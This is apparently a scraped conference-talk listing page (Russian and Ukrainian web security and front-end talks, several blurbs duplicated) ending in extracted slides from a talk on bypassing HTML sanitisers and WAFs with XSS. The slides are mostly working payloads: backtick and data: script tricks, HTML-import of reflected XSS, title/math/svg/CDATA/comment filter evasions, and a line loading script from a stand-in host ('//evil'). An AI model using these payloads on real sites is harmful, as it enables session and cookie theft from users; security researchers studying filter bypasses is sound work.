Ведущий: Эльдар Бейбутов
Интернет приложения - это интерфейс взаимодействия человеческого сознания с информационной системой. Процесс коммуникации людей и машинного кода не поддается формализации, невозможно учесть все возможные состояния системы в ручную, для этого необходимы интеллектуальные средства защиты, которые будут способны к самостоятельному обучению и принятию решений на основе многофакторных моделей. На докладе поговорим о эвристических механизмах обнаружения атак, автоматическом создании позитивной модели и поведенческом анализе.
Ведущий: Эльдар Бейбутов
Интернет приложения - это интерфейс взаимодействия человеческого сознания с информационной системой. Процесс коммуникации людей и машинного кода не поддается формализации, невозможно учесть все возможные состояния системы в ручную, для этого необходимы интеллектуальные средства защиты, которые будут способны к самостоятельному обучению и принятию решений на основе многофакторных моделей. На докладе поговорим о эвристических механизмах обнаружения атак, автоматическом создании позитивной модели и поведенческом анализе.
Максим Ширшин "SVARX, или Борьба с большими формами"Yandex
Максим Ширшин "SVARX, или Борьба с большими формами"
Я.Субботник в Новосибирске
О докладе:
Как реализовать и поддерживать валидацию сложных веб-форм? Зачем проверять формы на стороне клиента? Что должен уметь фреймворк для клиентской валидации? Зачем был придуман SVARX, как он устроен и как начать его использовать?
Как сделать Instagram в браузере — Дмитрий Дудин, xbSoftwareYandex
Дмитрий расскажет о:
применении фильтров и эффектов для изображений прямо в браузере;
достоинствах и недостатках Canvas, WebGl, SVG и CSS-фильтров и шейдеров;
неизведанном мире SVG-фильтров, его продуманных до мелочей устоях, синтаксисе и правилах;
возможностях обработки изображений — от простых чёрно-белых картинок до нелинейных искажений и градиентных карт.
В докладе будет минимум скучной теории и максимум живых примеров.
Waf.js: как защищать веб-приложения с использованием JavaScriptPositive Hack Days
Ведущие: Денис Колегов и Арсений Реутов
Авторы доклада продемонстрируют, как внедрение клиентских сценариев JavaScript может быть использовано для обнаружения и предотвращения различных атак, поиска уязвимых клиентских компонент, определения утечек данных об инфраструктуре веб-приложений, выявления веб-ботов и инструментальных средств нападения. Поделятся собственными методами обнаружения инъекций при помощи синтаксических анализаторов без сигнатур и фильтрующих регулярных выражений, а также рассмотрят реализацию концепции JavaScript-ловушек на стороне клиента для атак SSRF, IDOR, Command Injection и CSRF.
Безопасность в WordPress является очень важной темой при создании вашего интернет проекта, и в этом докладе мы рассмотрим основы безопасности при использовании WordPress, самые частые методы и причины взлома, меры и средства защиты вашего сайта от злоумышленников.
http://wpmag.ru/2013/osnovyi-bezopasnosti-wordpress/
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...QADay
Kyiv Quality Assurance Day 2019
ЄВГЕНІЙ ТОЛЧИНСКИЙ
«Як manual QA може протестувати проект з боку security»
Телеграм канал: wwww.t.me/goqameetup
Фейсбук сторінці: www.fb.com/goqaevent
Сайт: www.kyiv.qaday.org
Максим Ширшин "SVARX, или Борьба с большими формами"Yandex
Максим Ширшин "SVARX, или Борьба с большими формами"
Я.Субботник в Новосибирске
О докладе:
Как реализовать и поддерживать валидацию сложных веб-форм? Зачем проверять формы на стороне клиента? Что должен уметь фреймворк для клиентской валидации? Зачем был придуман SVARX, как он устроен и как начать его использовать?
Как сделать Instagram в браузере — Дмитрий Дудин, xbSoftwareYandex
Дмитрий расскажет о:
применении фильтров и эффектов для изображений прямо в браузере;
достоинствах и недостатках Canvas, WebGl, SVG и CSS-фильтров и шейдеров;
неизведанном мире SVG-фильтров, его продуманных до мелочей устоях, синтаксисе и правилах;
возможностях обработки изображений — от простых чёрно-белых картинок до нелинейных искажений и градиентных карт.
В докладе будет минимум скучной теории и максимум живых примеров.
Waf.js: как защищать веб-приложения с использованием JavaScriptPositive Hack Days
Ведущие: Денис Колегов и Арсений Реутов
Авторы доклада продемонстрируют, как внедрение клиентских сценариев JavaScript может быть использовано для обнаружения и предотвращения различных атак, поиска уязвимых клиентских компонент, определения утечек данных об инфраструктуре веб-приложений, выявления веб-ботов и инструментальных средств нападения. Поделятся собственными методами обнаружения инъекций при помощи синтаксических анализаторов без сигнатур и фильтрующих регулярных выражений, а также рассмотрят реализацию концепции JavaScript-ловушек на стороне клиента для атак SSRF, IDOR, Command Injection и CSRF.
Безопасность в WordPress является очень важной темой при создании вашего интернет проекта, и в этом докладе мы рассмотрим основы безопасности при использовании WordPress, самые частые методы и причины взлома, меры и средства защиты вашего сайта от злоумышленников.
http://wpmag.ru/2013/osnovyi-bezopasnosti-wordpress/
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...QADay
Kyiv Quality Assurance Day 2019
ЄВГЕНІЙ ТОЛЧИНСКИЙ
«Як manual QA може протестувати проект з боку security»
Телеграм канал: wwww.t.me/goqameetup
Фейсбук сторінці: www.fb.com/goqaevent
Сайт: www.kyiv.qaday.org
React со скоростью света: не совсем обычный серверный рендерингTimophy Chaptykov
Расскажу о небольшом исследовании, в котором мы думали о том, можем ли мы себе позволить использовать React для отдельных элементов на сайте, как устроен серверный рендеринг в VK; и получилось ли связать одно с другим. Упомяну о строковых шаблонизаторах, виртуальной DOM и LR-парсерах.
Как создавался интернет и почему он похож на один большой костыль?
Как развитие интернета способствовало развитию уязвимостей и как это в спешке пытаются (но это не точно) все исправить.
Почему попытки классификации уязвимостей выглядят смешно?
Почему практически все, что нас окружает - плохо и как с этим жить дальше?
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Дмитрий Бумов
There are regular and smart firewalls. The regular ones are quite clear, it was a good report on the latest Black Hat. However, we need a completely different approach to come round advanced protection.
Есть фаерволы на регулярных выражениях, а есть умные. Если с первыми все понятно — был отличный доклад на последнем Black Hat, то чтобы обойти современную защиту, нужно иметь совершенно другой подход!
пресс конференция 15.06.2016. безопасность платежных систем и банковДмитрий Бумов
В мире, где предоставление услуг коммерческими организациями и государственными ведомствами реализуется через сеть Интернет, обеспечение доступности, защита от взломов и подмены контента на веб-ресурсе становится важной задачей, за невыполнение которой могут “полететь головы с плеч” специалистов служб информационной безопасности. Несмотря на усилия ИБэшников и разработчиков средств веб-защиты, в гонке «ИТ-вооружения» обороняющаяся сторона традиционно занимает догоняющую позицию, количество атак год от года растет, меняются вектора и подходы к их организации.
5. Переопределение базового адреса текущего документа
<base href=“//mysite”>
Все относительные ссылки после вызова base будут
вызываться из указанного источника.
6. • Что попадает в атрибуты можно преобразовать в другое
представление символов – HTML сущности (мнемоники)
13. И как я уже говорил, во всех атрибутах
<a
href="//\/@g⁠o​o&z
wnj;g‍l­e
.	com">clickme</a>
Это ссылка на google.com
14. В протоколе data не обязательно указывать тип контента
<script src=data:,alert()>
15. Для выполнения функции не обязательно использовать скобки!
… И точку
… И знак равно
… И буквы вообще
17. • Его можно использовать для вызова функций
<script>alert`1`</script>
• Его можно использовать для передачи строки
document[`cookie`]
• Им можно «вырезать» неугодные нам части при двух уязвимых
параметрах, или если наши данные вставляются 2 раза.
Бэктик – твой лучший друг
19. Все что между /слэшами/ - регулярное выражение
alert(/1/)
Добавление к регулярному выражению .source – возвращает
оригинальную строку
eval(/alert()/.source)
20. Обращения в контексте текущего домена не будет заблокировано
хромом
Например если попытаться вызвать <script src=/test.js>
Импорт на импорт
21. Если в пути у сайта есть XSS, как часто бывает:
"Страницы /<script>alert()</script>/index.html не существует!”
Ты спокойно можешь импортировать xss в текущую страницу
<link rel=import href="/<script>alert()</script>/index.html">
Импорт на импорт
23. Импортом можно вызывать ранее недоступные нам функции
<link rel=“import” href=“/page.html”>
(страница, где подключается jquery)
=>
<svg onload=$.GetScript(‘//evil’)>
24. Загруженный файл (например, изображение) может быть
интерпретирован как js*
Но еще круче, любой загруженный файл может быть
интерпретирован как html
?id=“><link rel=import href=“/static/userfile/myphoto.jpg”>
25. Внутри строк js тоже много фич, например перевод символов в
другие представления (x22, u0022), неявные вызовы функций
26. • http://utf-8.jp/public/jjencode.html
Вызов функции с помощью кучи спецсимволов))
• https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
Вызов функции с помощью символов [+|>]
• http://www.jsfuck.com/
Вызов функции с помощью символов ()+[]!
Ну и прочая наркомания
29. Где можно встретить HTML фильтры?
• WYSIWYG редакторы
• WAFы
• WEB почта
• И ещё где-нибудь в интернете
30. Какие бывают фильтры?
• Чёрный список
<randomtag onevent="test">randomtag</randomtag>
<randomtag>randomtag text</randomtag> Randomtag text
HTML code
• Белый список
<randomtag onevent="test">randomtag text</randomtag>
31. Фаззинг HTML
• Фильтр по чёрному списку
- Фаззим атрибуты событий если пропустило onevent
- Фаззим XSS вектора без событий
- Фаззим HTML теги
- Фаззим HTML теги и особенности их фильтрации
• Фильтр по белому списку
- Фаззим XSS вектора без событий
- Фаззим HTML теги и особенности их фильтрации
43. Особенности фильтрации.
• Не фильтруется содержимое одного из волшебных тегов.
<title><test test=“<test>”></title>
44. Особенности фильтрации.
• Не фильтруется содержимое одного из волшебных тегов.
• XSS вектор:
<title><test test=“<test>”></title>
<title><img alt=“</title><svg/onload=alert(1)>”></title>
45. Особенности фильтрации.
• Не фильтруется содержимое одного из волшебных тегов, но
значение атрибутов энкодится в сущности.
<title><test test=“<test>”></title>
46. Особенности фильтрации.
• Не фильтруется содержимое одного из волшебных тегов, но
значение атрибутов энкодится в сущности.
- Фаззим другие атрибуты
<title><test test=“<test>”></title>
47. Особенности фильтрации.
• Не фильтруется содержимое одного из волшебных тегов, но
значение атрибутов энкодится в сущности.
- Фаззим другие атрибуты
- Используем теги math/svg/title
<title><test test=“<test>”></title>
<math>
<title>
<i>
<script>alert(1)</script>
</i>
</title>
</math>
51. Особенности фильтрации.
• Парсер CSS
- Фаззинг свойств CSS
- Применяем теги math/svg/title
<title><test test=“<test>"></title>
<style><!-- error --></style>
<style>
body {
%color%:"<test test=test>";
}
</style>
52. Особенности фильтрации.
• Волшебные теги вернулись отфильтрованными, но содержимое
коментариев нет.
<title><test test=“<test>”></title>
<!--<test test="<test>">test</test>-->
<![CDATA[<test test="<test>">test</test>]]>
<?<test test="<test>">test<!</test>
55. Особенности фильтрации.
• Секция CDATA в HTML
• XSS вектор:
<![CDATA[<script>alert(1)</script>]]>
<![CDATA[><script>alert(1)</script>]]>
56. Особенности фильтрации.
• Секция CDATA в HTML
• XSS вектор:
• Загадочные комментарии и трюк с волшебными тегами
<![CDATA[<script>alert(1)</script>]]>
<title><?<img alt=“<?</title><?<iframe src=javascript:alert(1)>”></title>
<![CDATA[><script>alert(1)</script>]]>